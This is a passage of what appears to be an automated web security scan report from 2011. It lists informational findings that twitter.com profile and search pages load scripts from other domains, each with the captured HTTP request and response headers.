<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.538. http://twitter.com/rwaldron previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/rwaldron

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225072-30588-18769
ETag: "467245d95e03c9c4efa08a62b5cdfe26"
Last-Modified: Fri, 28 Jan 2011 14:31:12 GMT
X-Runtime: 0.01191
Content-Type: text/html; charset=utf-8
Content-Length: 52265
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.539. http://twitter.com/ryanolson previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ryanolson

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225039-20499-32646
ETag: "d2211433f4fd1a9e6d92a74f1cc30349"
Last-Modified: Fri, 28 Jan 2011 14:30:39 GMT
X-Runtime: 0.01104
Content-Type: text/html; charset=utf-8
Content-Length: 54351
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.540. http://twitter.com/scott_gonzalez previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/scott_gonzalez

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225038-20727-28381
ETag: "e3250478c3ea8a086affa5704f05f05d"
Last-Modified: Fri, 28 Jan 2011 14:30:38 GMT
X-Runtime: 0.01142
Content-Type: text/html; charset=utf-8
Content-Length: 46926
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.541. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://a2.twimg.com/a/1296179758/javascripts/fronts.js
http://a3.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /search?q=%23title HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

18.542. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://a2.twimg.com/a/1296179758/javascripts/fronts.js
http://a2.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

Response

18.543. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/fronts.js
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /search?q=%23title HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

18.544. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://a2.twimg.com/a/1296179758/javascripts/fronts.js
http://a2.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225145-63580-49735
ETag: "eec4d16b43e4c8e95f60951c5b2a67d5"
Last-Modified: Fri, 28 Jan 2011 14:32:25 GMT
X-Runtime: 0.04800
Content-Type: text/html; charset=utf-8
Content-Length: 19901
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlNDdkNWFhZTBiYTQ4ZGY5ZjUxMzYwMmYwMmI3ZWJj%250AYmI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--8b48d821027ac6ccf6e1de74ab0896f9fb5027eb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</h2>

<script src="http://a2.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

18.545. http://twitter.com/sentience previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/sentience

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225077-43301-33019
ETag: "6e942a84bdcf3e0bad65268b7ad885b6"
Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT
X-Runtime: 0.01443
Content-Type: text/html; charset=utf-8
Content-Length: 50391
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.546. http://twitter.com/simplemodal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/simplemodal

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:29:05 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224945-98814-3009
ETag: "203a0c353b6f6f89b45f107452b2203c"
Last-Modified: Fri, 28 Jan 2011 14:29:05 GMT
X-Runtime: 0.02016
Content-Type: text/html; charset=utf-8
Content-Length: 47151
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.547. http://twitter.com/sitepointdotcom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/sitepointdotcom

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225034-62449-28872
ETag: "9ce581b329f6d5870310b5ced0d02fe8"
Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT
X-Runtime: 0.01185
Content-Type: text/html; charset=utf-8
Content-Length: 53056
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.548. http://twitter.com/slaterusa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/slaterusa

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /slaterusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-47321-52923
ETag: "e18f995e42882bc3925d1122528b563b"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.01113
Content-Type: text/html; charset=utf-8
Content-Length: 47275
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.549. http://twitter.com/slaterusa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/slaterusa

Issue detail

The response dynamically includes the following scripts from other domains:

